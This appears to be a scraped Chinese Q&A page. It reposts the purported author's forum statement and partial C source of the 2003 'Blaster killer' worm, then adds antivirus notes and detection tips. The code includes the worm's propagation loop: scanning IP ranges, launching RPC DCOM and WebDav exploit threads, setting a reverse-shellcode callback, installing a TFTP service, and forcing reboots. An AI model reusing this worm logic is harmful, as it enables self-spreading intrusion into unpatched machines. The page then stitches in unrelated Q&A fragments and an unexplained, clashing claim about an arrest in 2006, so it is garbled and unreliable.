《冲击波杀手》那个黑客是谁?
给您转一篇文章 也许对您有用
冲击波杀手的作者网上现身
前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域网络带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见
http://www.donews.com/donews/article/5/50423.html
8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。
下文为作者自述-转自某安全论坛
玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~
char *szMe = "=========== I love my wife & baby ~~~ Welcome Chian~~~
Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";
偶:小地方小公司小小程序员
偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~
A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂
~~~
B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众
偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳
~~
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~
D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~
E 长了这么大,算首次报效社会吧~~~
F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!
======================================================
0 chian 系 china 笔误~~ 敲的快了,某个指头先到~~~
1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~
2 RpcDcom & WebDav 使用同一 反向shellcode, 用 eyas的, lion修改
(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)
此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k & xp
他丫的,还有放毒公司言导致xp机器重启云云的~~~
3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~
4 某年某月某日某时某刻,
溜出国门,辗转借了几台 Xeon™ 4 cpus, 2g memory 机器
架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段
10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 ~~~
5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ 刺激一下也好~~~
打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~
//偶婆婆, 烂代码~~~ 将就看吧~~~
BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp
if ( ReadRegServicePack(nSystemVer) )
return FALSE; //已经安装了
//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();
LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);
if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法
~~
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn
nLanguageID = 1; //就是为这个来的~~
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp
nLanguageID = -1; //偶好有干掉鬼子机器的冲动!
//罢了,冤冤相报何时了~~~ 希望他丫的自新
~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}
if ( nLanguageID == -1)
return FALSE;
char szServicePack[] = "RpcServicePack.exe";
// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
return FALSE;
}
char szExec[180];
sprintf(szExec, "%s -n -o -z -q", szServicePack);
HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;
if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内
未完成
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);
Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot
it~~~
Sleep(20000); //说偶重启有过? 不重启补丁无效,
找 Bill该死 说去~~~
}
return TRUE;
}
// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL
bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;
for (int i=0;i< (nBCount * 256 * 256); i++){
if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;
if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好
~~~
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp>>8) == 0xc5 ||
(BYTE)(uComp>>16) == 0xc5 ||
(BYTE)(uComp>>24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp>>8) == 0x9999 ||
(WORD)(uComp>>16) == 0x9999 )
continue;
u_long *myPara = new u_long;
if ( myPara == NULL ){//如果分配失败,再尝试一次
Sleep(100);
myPara = new u_long;
}
if ( myPara ){
if ( hThread )
CloseHandle(hThread);
*myPara = htonl( uComp);
DWORD dwThreadId;
if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId);
Sleep(2);
}
//添加此处代码,避免首次执行时,线程中的
InterlockedIncrement(&g_CurThreadCount) 未来得及运行,一次性建立了N个线程的
bug!
if ( bFirst && (i >= nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}
while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心,
玩过了~~~
Sleep(2);
}
Sleep(60000);
}
//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
return;
//杀蠕虫
KillMsblast();
//卸载
SYSTEMTIME st;
GetLocalTime(&st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe();
ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将
自身文件删除了
}
srand( GetTickCount() );
memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补
丁已经打够了!~~~
//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);
//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();
CheckOnlienAndPressData(); //get LocalIp & 修正子弹中的反向ip 和 端口
//打补丁
DoServicePackFunction();
//建立接收线程
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L
PVOID)NULL,0,&dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,
同时处理多个反连
return;
CloseHandle(hWorkThread);
if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}
Sleep(2000); //等待接收线程中的全局 rand bind port
u_long ulIP;
for(;{ //估算了一下,普通机器2小时一循环
//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP &= 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);
//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);
//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,
立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);
//再扫描随机的IP, 数量1个 B段, rpc or webdav
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~
KillMsblast();
}
//WSACleanup();
}
--------------------------------------------------------------------------------------------------
为方便阅读,增加几个补充说明
1.flashsky www.xfocus.net创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。
2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你最好别招惹他,DDOS你一把也够受的。
3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认。
瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过,这个新病毒生来就是原冲击波病毒的克星。
瑞星反病毒工程师分析说:该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉,并在系统内值入,预防冲击波病毒的疫苗。
然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意作恶,病毒设定在2004年自行毁灭。
由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此瑞星反病毒工程师提醒广大用户,设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。
是一位年仅18岁的美国黑客,在2006年8月被FBI联邦调查局逮捕
冲击波病毒的病毒应对
此时,计算机用户应该采取以下方式检测: 1)检查系统的system32\\Wins目录下是否存在DLLHOST.EXE文件(大小为20K)和SVCHOST.EXE文件,(注意:系统目录里也有一个DLLHOST.EXE文件,但此为正常文件,大小只有8KB左右)如果存在这两个文件说明计算机已经感染了“冲击波杀手”病毒; 2)在任务管理器中查看是否...
冲击波病毒
3、不能复制粘贴;4、有时出现应用程序,比如Word异常;5、网络变慢;6、最重要的是,在任务管理器里有一个叫“msblast.exe”的进程在运行!7、SVCHOST.EXE产生错误会被WINDOWS关闭,您需要重新启动程序 8、在WINNT\\SYSTEM32\\WINS\\下有DLLhost.exe和svchost.exe 检测你的计算机是否被"冲击波杀手"病毒...
电脑中病毒了是马上发作还是大概什么时候发作?
您好,有的潜在病毒并不会马上运行起来的,所以具体的中毒表现还是要视病毒的针对而言的。如果电脑内感染了病毒,推荐您使用电脑管家为您杀毒,电脑管家拥有基于CPU虚拟执行技术,可以彻底根除电脑中的木马病毒,杀毒后请重启电脑,防止病毒文件再生而二次中毒。安全提示,为了电脑系统的安全,下载或接收文件后...
DLLHost.exe是什么进程啊?
dllhost.exe进程是微软为其Windows系统定义的重要的系统进程,系统描述为:COM Surrogate,一般都将其称为COM +宿主进程(COM +组件服务全称:Microsoft Component Services),它执行控制基于DLL的COM对象、Internet信息服务(IIS)。另外,根据应用程序的使用情况可能会出现多个 dllhost.exe 实例同时运行,这是...
苹果手机会得冲击波杀手病毒·吗
没越狱的不会 如果越狱请在cydia中下载腾讯手机管家PRO版。管家能够查杀大量的手机病毒,病毒库也会在WIFI环境下自动更新,你可以直接在手机管家的界面中点“防护监控”,然后选择病毒查杀,最后点一下病毒扫描即可,而且防护和杀毒效果还是很不错的。
冲击波病毒
详情请查看视频回答
请您帮我翻译
dllhost.exe是运行COM+的组件,即COM代理,运行Windows中的Web和FTP服务器必须有这个东西。什么时候会出现dllhost.exe?运行COM+组件程序的时候就会出现。例如江民KV2004 击波杀手又是怎么一回事?冲击波杀手借用了dllhost.exe作为进程名,但是由于Windows不允许同一个目录下有同名文件的存在,因此,冲击波...
防火墙不停的拦截到来自***(IP)的冲击波。
感染了“冲击波杀手”的机器会通过Ping网内其他机器的方式来寻找RPC漏洞,一旦发现,即把病毒传播到这些机器上。感染局域网传染病毒的机器也会自动发送信息,这样的情况就要注意先打冲击波补丁,并且查毒。我中了V-King。但同网的就是不杀毒不理会。我只好每天不和他们同时上网。 【⑵】:一些常见端口信息日志 ··[...
monitoringhost.exe是一个什么进程
运行COM+组件程序的时候就会出现。例如江民KV2004冲击波杀手借用了dllhost.exe作为进程名,但是由于Windows不允许同一个目录下有同名文件的存在,因此,冲击波杀手把病毒体:dllhost.exe放到了C:\\Windows\\System32\\Wins目录里面(Windows 2000是C:\\WINNT\\System32\\Wins,全部假设系统安装在C盘)...
msdtc病毒怎么杀
介 绍:com代理,系统附加的dll组件越多,则dllhost占用的cpu资源和内存资源就越多,而8月的“冲击波杀手”大概让大家对它比较熟悉吧。解决Web服务器出现的dllhost.exe错误 我的Web服务器出了问题。一个弹出话框显示“dllhost.exe出现错误”。当我查看应用事件日志时发现有很多Active Server Pages Event ...
邲方科洛: 根本没有,我是初三毕业,我成绩全校倒数第一真的不是扯,老师告诉我们考试不及格的有肄业证,但是我去拿的时候只有毕业证听好了只有毕业证,成绩不好顶多迟发给你,别听别人说有什么的,我初三毕业我亲眼所见没有肄业证!
界首市15977564358: 篇篇情(关于篇篇情的基本详情介绍) ?
邲方科洛: 1、《篇篇情》节目共有七个篇章.2、依次为:周一流行篇;周二随想篇;周三交友篇;周四怀旧篇;周五灵犀篇;周六娱乐篇;周日追梦篇.
界首市15977564358: 女方自愿但未满18周岁,发现怀孕了,男方已成年,能告强奸吗? ?
邲方科洛: 如果女方已满十四周岁,又是女方自愿的话,就不构成强奸了.如果孩子生下来,男的需要出医疗费和抚养费.如果不要孩子,男的需要出医疗费用.
界首市15977564358: 警戒结束(关于警戒结束的基本详情介绍) ?
邲方科洛: 1、《警戒结束》是美国OpenRoadFilms公司发行的犯罪剧情片,由大卫·阿耶执导,杰克·吉伦哈尔、迈克尔·佩纳、安娜·肯德里克等联合主演.2、该片于2012年9月21日在美国上映.3、该片主要讲述了美国洛杉矶巡警与毒贩之间斗争的故事.
界首市15977564358: 主页被修改换不回来了?
邲方科洛: 建议下载安装360安全卫士进行修复IE、去掉多余的启动项、清除恶意插件、打描病毒、清理掉垃圾文件,这几项操作都很快完成,不要认为麻烦.如果360安装后打不开,说明中毒比较严重,在以下网站下载360专杀工具后进行查杀一次就可以启动360完全清除各种病毒了. www.360.cn
界首市15977564358: 天网报警信息:Maverick's Matrix?
邲方科洛: 网的日志一般有三行: 第一行:数据包发送(接受)时间/发送者IP地址/对方通讯端口/数据包类型/本机通讯端口 第二行:为TCP数据包的标志位,共有六位标志位,分别是:URG、ACK、PSH、RST、SYN、FIN,天网在显示标志位时取这六个...
界首市15977564358: 大学生到校报到注册就有学籍吗 ?
邲方科洛: 一般是有的
界首市15977564358: 当今法律有没有规定子债父还 ?
邲方科洛: 当今法律没有规定子债父偿.如果年满18周岁,有完全行为能力的人就是一个独立的... 那么这个欠条在证据不足的情况下是成立的.父亲在世,子女如果已经有自己的独立...
界首市15977564358: 年轻人梦见坏人闯入校园(梦见坏人敲门试图闯入) ?
邲方科洛: 年轻人梦见坏人闯入校园,预示着你近期你的身体状况不好,肩部常常觉得酸麻,也许是工作的时候低头的时间太长造成的.
界首市15977564358: 请问人防工程中人防门和防火门冲突怎么办?求解答 ?
邲方科洛: 人防工程中人防门和防火门冲突可以先安装人防门,再人防门框内再安装防火门,不过现在不允许如此安装,必须错开位置安装.